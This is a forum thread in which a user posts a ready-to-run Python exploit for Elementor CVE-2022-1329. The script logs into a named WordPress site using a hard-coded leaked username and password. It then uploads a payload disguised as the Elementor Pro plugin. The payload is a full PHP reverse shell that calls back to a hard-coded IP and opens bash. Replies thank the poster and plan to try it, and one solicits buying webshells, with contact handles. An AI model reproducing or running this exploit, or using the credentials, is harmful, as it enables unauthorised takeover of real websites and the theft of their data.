Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Leak CVE-2022-1329 vulnerability exploit filter_list
Author
Message
CVE-2022-1329 vulnerability exploit #1
Hi all, I leave you an exploit I created to exploit Elementors CVE-2022-1329 vulnerability:

Code:
#!/usr/bin/python import requests import re requests.packages.urllib3.disable_warnings() ''' payload content: Create a zip file named payload.zip that contains a file called elementor-pro.php with your payload.   example:   (php reverseshell)   <?php     /**     * Plugin Name: Elementor Pro     */         set_time_limit (0);     $VERSION = "1.0";     $ip = '133.198.33.194';      $port = 443;          $chunk_size = 1400;     $write_a = null;     $error_a = null;     $shell = 'uname -a; w; id; /bin/bash -i';     $daemon = 0;     $debug = 0;         if (function_exists('pcntl_fork')) {         // Fork and have the parent process exit         $pid = pcntl_fork();                 if ($pid == -1) {             printit("ERROR: Can't fork");             exit(1);         }                 if ($pid) {             exit(0);  // Parent exits         }             // Make the current process a session leader         // Will only succeed if we forked         if (posix_setsid() == -1) {             printit("Error: Can't setsid()");             exit(1);         }             $daemon = 1;     } else {         printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");     }         // Change to a safe directory     chdir("/");         // Remove any umask we inherited     umask(0);         //     // Do the reverse shell...     //         // Open reverse connection     $sock = fsockopen($ip, $port, $errno, $errstr, 30);     if (!$sock) {         printit("$errstr ($errno)");         exit(1);     }         // Spawn shell process     $descriptorspec = array(       0 => array("pipe", "r"),  // stdin is a pipe that the child will read from       1 => array("pipe", "w"),  // stdout is a pipe that the child will write to       2 => array("pipe", "w")  // stderr is a pipe that the child will write to     );         $process = proc_open($shell, $descriptorspec, $pipes);         if (!is_resource($process)) {         printit("ERROR: Can't spawn shell");         exit(1);     }         // Set everything to non-blocking     // Reason: Occsionally reads will block, even though stream_select tells us they won't     stream_set_blocking($pipes[0], 0);     stream_set_blocking($pipes[1], 0);     stream_set_blocking($pipes[2], 0);     stream_set_blocking($sock, 0);         printit("Successfully opened reverse shell to $ip:$port");         while (1) {         // Check for end of TCP connection         if (feof($sock)) {             printit("ERROR: Shell connection terminated");             break;         }             // Check for end of STDOUT         if (feof($pipes[1])) {             printit("ERROR: Shell process terminated");             break;         }             // Wait until a command is end down $sock, or some         // command output is available on STDOUT or STDERR         $read_a = array($sock, $pipes[1], $pipes[2]);         $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send         // data to process's STDIN         if (in_array($sock, $read_a)) {             if ($debug) printit("SOCK READ");             $input = fread($sock, $chunk_size);             if ($debug) printit("SOCK: $input");             fwrite($pipes[0], $input);         }             // If we can read from the process's STDOUT         // send data down tcp connection         if (in_array($pipes[1], $read_a)) {             if ($debug) printit("STDOUT READ");             $input = fread($pipes[1], $chunk_size);             if ($debug) printit("STDOUT: $input");             fwrite($sock, $input);         }             // If we can read from the process's STDERR         // send data down tcp connection         if (in_array($pipes[2], $read_a)) {             if ($debug) printit("STDERR READ");             $input = fread($pipes[2], $chunk_size);             if ($debug) printit("STDERR: $input");             fwrite($sock, $input);         }     }         fclose($sock);     fclose($pipes[0]);     fclose($pipes[1]);     fclose($pipes[2]);     proc_close($process);         // Like print, but does nothing if we've daemonised ourself     // (I can't figure out how to redirect STDOUT like a proper daemon)     function printit ($string) {         if (!$daemon) {             print "$string\n";         }     }         ?> ''' payloadFileName = 'payload.zip' baseUrl = 'https://share.s21sec.com/' username = 'mcaballero' password = 'P(9NE@Zw*R0P9]SpB1Vo'  # creds found on https://github.com/unaitxebrria/escaneo_vulnerabilidades_internas/blob/main/scripts/wordpress_scanner.php https://github.com/unaitxebrria/escaneo_vulnerabilidades_internas/blob/main/results/Vulnerability%20report.json session = requests.Session() cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } def DoLogin(username, password):     global cookies     loginUrl = baseUrl + 'wp-login.php'     adminUrl = baseUrl + 'wp-admin/'     data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }     regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}')     response = session.post(loginUrl, cookies=cookies, data=data,verify=False)     search = regexp.search(response.text)     if not search:         print('Error - Invalid credentials?')     else:         print("NONCE")         nonce_raw = search.group()         nonce_ok = nonce_raw[76:86]         return nonce_ok def UploadFile(fileName, nonce):     uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'     data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }     files = { 'fileToUpload' : open(fileName, 'rb') }     regexp = re.compile('"elementorProInstalled"')     response = session.post(uploadUrl, data=data, files=files,verify=False)     search = regexp.search(response.text)     if not search:         print ('Error - Upload failed')         return False     else:         print ('Upload completed successfully!')         return True def ActivatePayload():     payloadUrl = baseUrl + 'index.php?activate=1'     session.get(payloadUrl)     print('Trying to login...') nonce = DoLogin(username, password) print('Nonce found: ' + nonce) print('Uploading payload...') fileUploaded = UploadFile(payloadFileName, nonce) print ('Activating payload...') ActivatePayload() print('Payload activated!')   

Hope this exploit can be useful for you.

[+] 1 user Likes bugsbunny's post
Reply

RE: CVE-2022-1329 vulnerability exploit #2
Great. I am going to try it.

[+] 1 user Likes odin221b's post
Reply

RE: CVE-2022-1329 vulnerability exploit #3
Do you know webshell. .
hey bro
I need buy shell everyday。。
.php
..http/https
-company buy shells for SEO.
---random da/ip
If willing to sell, please contact me. We can discuss the issue of unit price.
I need a hacker seller who can provide a stable supply.
pls feel free contact me。。
TG @COF65
ICQ @venda876

Reply

RE: CVE-2022-1329 vulnerability exploit #4
I will try to do this too. Are you searching for a free essay writing website? If you are not able to understand how to write an essay then you can take the help of this website https://writinguniverse.com/free-essay-e...e-and-men/ Of mice and men has widespread topics that can be examined in any culture and time. John Steinbeck composed lessons of the heart, lessons that instruct children on what it is to be a human being with sympathy for this individual person and a social inner voice.
(This post was last modified: 11-22-2022, 08:34 AM by JasonSmith.)

Reply

RE: CVE-2022-1329 vulnerability exploit #5
Nice, great work post on github/lab

Reply

RE: CVE-2022-1329 vulnerability exploit #6
great code, going to give this a try

Reply

RE: CVE-2022-1329 vulnerability exploit #7
Thanks for the Elementor exploit mate, appreciated

Reply

RE: CVE-2022-1329 vulnerability exploit #8
thank you, will have to review and get back to you Smile

Reply

RE: CVE-2022-1329 vulnerability exploit #9
What exactly does this do?

Reply